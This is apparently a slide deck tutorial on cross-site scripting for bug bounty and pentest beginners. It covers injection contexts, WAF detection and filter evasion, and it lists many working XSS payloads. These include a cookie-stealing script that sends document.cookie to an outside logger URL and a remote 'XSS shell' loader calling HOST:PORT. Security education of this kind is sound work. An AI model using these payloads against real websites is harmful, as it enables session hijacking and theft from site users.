Embed Size (px)
Citation preview
XSS Primer: Noob to Pro in 1 hour
By @snoopy_security
Who and Why• Student & Junior Security Consultant.
• XSS is a easy win if you do it correctly.
• Bug bounties pay well and clients give you respect.
• Cross site scripting is one of the oldest web application attacks known and is to be dated around 1996-1998
What is XSS? Untrusted data from user is processed by the
application without any sort of validation.
It affects client side but the vulnerability resides in the server side.
Different types Reflected, Stored and DOM XSS
What is XSS?
Reflected XSSWhat is wrong with the above code?
The above code just prints the comment which is retrieved from the $_GET variable.
Can add malicious JavaScript with the original URL.
<?php echo '<h1>Hello ' . $_GET["name"]. '</h1>';
Some Beginner Tips XSS can come from anywhere. Some common ones are
URL parameter Headers i.e user agent Metadata Input forms Text area Hidden fields Flash parameters File Uploads
Some Beginner Tips 1. Try injection HTML Tags as well and malicious JavaScript
2. SVG is always good for a short and crisp attack vector. Can add whitespaces forward slashes and unclosed tags.
3. Add junk data with your payload
4. Always try a couple of different payloads. This mainly applies when trying to evade filters.
"><svg/onload=prompt(1)>
Stored XSS Malicious payload is stored by the server though database
or other forms of storage and is reflected back.
This form of attack is easier than phishing with XSS payloads.
Can get admin cookies as well access to the internal network depending on the attack vector.
DOM XSSThe document object model is a structured representation of the web page rendered by the browser.
DOM is where event handlers and any other JavaScript functions execute. DOM shows all the JavaScript and HTML rendered by your browser.
DOM defines a way a webpage accessed and manipulated.
An attacker can manipulate the DOM by adding malicious JavaScript which can change elements set by the DOM to attack a victim.
DOM XSS To find DOM XSS, analyse the JavaScript being executed on
the page and see if DOM being written.
DOM is not view source. Inspect element is a better visual representation of the DOM.
ZAP,Burp and other proxies does pick up unsafe methods but you will need to check manually.
If it cannot be exploitable, try figuring about what library and unsafe sink the application is using. E.g. jquery .attr()
DOM XSS Common methods used to access DOM
document.location document.URL document.URLUnencoded document.referrer window.location
Passed data can then be written by methods such as eval, document.write and window.setinterval.
Useful sourcesOWASP DOM XSS prevention cheat – gives you good explanation on unsafe methods that directly modify DOM.
The DOM XSS wiki :https://code.google.com/p/domxsswiki/wiki/Introduction
The wiki has useful information on dangerous methods, common sources and sinks.
Other variations include Mutation XSS. More on that later…..
Context is Everything
Context is where the given input is reflected back.
Five common ones
1. HTML2. Attributes3. Script 4. URL5. Style
HTML Context Malicious input in reflected back in the html body in tags
such as <div><p><title> and more.
Easiest to attack
Close the tag and try <script>alert(1)</script> or any similar payload.
Attribute Context HTML elements can have attributes. Attributes are
Input is reflected in a attribute element. So look for input being reflected back in ‘value =‘ or ‘alt =‘ or something similar.
Most of the time, attributes will be inside a single or a double quote.
Couple of tips1. Break out of the context by closing the quote and attribute tag. E.g ‘>
2. Any type of encoding won’t help your payload if you can’t break out of context.
3. If in doubt, URL-encode any special characters that have signify & = + ; and space. aas' onload='prompt(0);''
4. Event handlers can also be used to attack attributes aas' onload='prompt(0);''
Script ContextThe input will be reflected back inside a script tag. break out of text with quotes and execute
Input is usually reflected back as part of a variable.
Payload example junk' ; alert(1);//
URL Context The input is reflected back in a href attribute. E.g.
<iframe src=“[Reflected Data]”> <a href==“[Reflected Data]”>Link</a> <META http-equiv=“refresh” content=““[Reflected Data]”>
No need to break out of context. Only need to encode payloads. This type of context requires the victim to click the URL to execute.
Tips Common ways to attack URL Context
The above payload is base64 encoded. More about encoding later.
You can also define the charset just like data, this might be useful in some cases.
javascript:prompt(0)
data/text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
CSS ContextAlso know as style contextInput is usually reflected in inside a style tag
Can be attacked using
Another common one
width:expression(alert(‘XSS’))
WAF Detection Usually Regex, Blacklist or whitelist based
WAF can sometimes detect inbound as well as outbound.
Most WAFs still detect using a signature based approach.
Common way to detect WAFs: Modified cookies, rewritten headers and response codes
WAF Detection Find combinations of allowed and block characters first.
Some known tools to detect WAF.
• Wafw00f• http-waf-fingerprint NSE script• http-waf-detect NSE script
Will only detect the popular ones.
xss,<>{};”’script
Filter Evasion 101 More than one ways to skin a web app! If <script> tag is blocked>
If site is filtering double and single quotes, you can use back tick (`). This technique only works on IE.
“><script >alert(document.cookie)</script >
“><ScRiPt>alert(document.cookie)</ScRiPt>“%3e%3cscript%3ealert(document.cookie)%3c/script%3e“><scr<script>ipt>alert(document.cookie)</scr</script>ipt>%00“><script>alert(document.cookie)</script>
Filter EvasionSome popular techniques consists of spaces, encoding and comments. Try using prompt or confirm instead of alert
Calling a external JavaScript file from inside a script source tag if brackets and quotes are blocked.
If the application is filtering quotes or blocking script tags, try the below
<SCRIPT SRC=https://web.archive.org/web/20150121175718/http://ha.ckers.org/xss.js></SCRIPT>
<img/src=x onerror=prompt(/XSS/);>
Filter EvasionWhen in doubt, try to comment everything after your payload.
If less than and greater than sign is filtered in attribute context, try
If script and src tags are blocked in a html context, try
<script>alert(1)</script><!-- (html/attribute context)“;alert(5);// (script context)
“ onload=“prompt(0);””
<object data=“javascript:alert(0)”>
Filter Evasion resourcesToo many techniques to present. Check them out here
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
http://codev587.net/xss-filter-evasion-cheat-sheet-no1.html
http://n0p.net/penguicon/php_app_sec/mirror/xss.html
EncodingEncoding – transferring data from one format to another. E.g. ASCII, Unicode, URL Encoding etc
Browsers support numerous encoding schemes but the attack vector depends on the page and its meta tag e.g.
Encoding is useful if the server is decoding correctly. Still need to break out of context correctly for the encoded payload to work.
<svg/onload=alert()>>
EncodingThe following table describes how a user can obfuscate an IP address:
This trick is getting more common among phishers. E.g.http://0xd2.0xdb.0xf1.0x7b/.online/BankofAmericaOnlineID/SignIn
URL Formhttp://127.0.0.1/ Decimalhttp://2130706433/ Dwordhttp://0x7f.0x00.0x00.0x01/ Hexhttp://0177.0000.0000.0001/ Octalhttp://127.0x00.0000.0x01/ Mixed
EncodingfromCharCode() method converts Unicode values into characters
Long UTF-8 Unicode encoding to bypass filters
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<img src=x onerror="javascript:alert('XSS')">
EncodingEncoding can also be useful to break up an XSS payload if the server is using pattern matching regex.
Can also double encode payloads. Depends on how the application processes encoded client requests.
The hexadecimal encoding of “../” represents "%2E%2E%2f“Double encoding of “../” represents "%252E%252E%252F"
<IMG SRC="jav	ascript:alert('XSS');">
More Filter EvasionASCII Decimal Encoded
Will turn into alert(‘XSS’). The payload uses html entities which is decoded and rendered by the browser.
ASCII Hex Encoded
Useful for bypassing ‘magic_quotes_gpc’
javascript:alert('XSS')
javascript:alert('XSS')
EncodingMore Examples here:http://htmlpurifier.org/live/smoketests/xssAttacks.phphttps://danielmiessler.com/study/encoding/
Some useful encoders:http://n0p.net/penguicon/php_app_sec/mirror/xss.htmlhttp://evuln.com/tools/xss-encoder/https://mothereff.in/html-entitieshttp://dev.w3.org/html5/html-author/charrefhttps://hackvertor.co.uk/publichttp://utf-8.jp/public/jjencode.html?src=
Actual attack vectors
<script>window.location="http://example.com/logger.php?cookie="+document.cookie;</script>
When executed, the above code sends the victims cookie to an attacker controlled site.
Can be used for many things including cookie stealing, drive by downloads, running browser exploits, phishing and more.
BeEF makes everything easy
More cool XSS payloads:http://www.xss-payloads.com/
Useful tools Opinion: Most scanners suck at finding XSS.
Couple of tools I like – Xenotix, XSSValidator Burp Plugin, Sleepy puppy (If testing multiple applications, has trackable XSS payloads)
How to build a scanner that works?A - Scanning within a browser engine.B - Using PhantonJS or similar webkit detect successful
reflected XSS.
I still prefer finding XSS manually but I like having options
XSS Shell DemoCool POC by Brutelogic. Fun way to report XSS than just script alert(1).
Attacker machine listener
Target payload<svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
Things I didn’t mentionFlash XSS – Embedded SWF files can be decompiled to source code. This can be used to find unfiltered variables which can be called from an URL to include malicious XSS.
XSS Polyglot – Upload a flash file and be accepted as vaild JavaScript. Run remote XSS with src tag. (can be beat CSP in rare cases)
Mutation XSS – There are more ways to trick DOM into parsing malicious XHTML like payloads.
All worth checking out…..
@snoopy_security
IRC:#SHUHACKSOCWebsite:http://shuhacksoc.co.uk
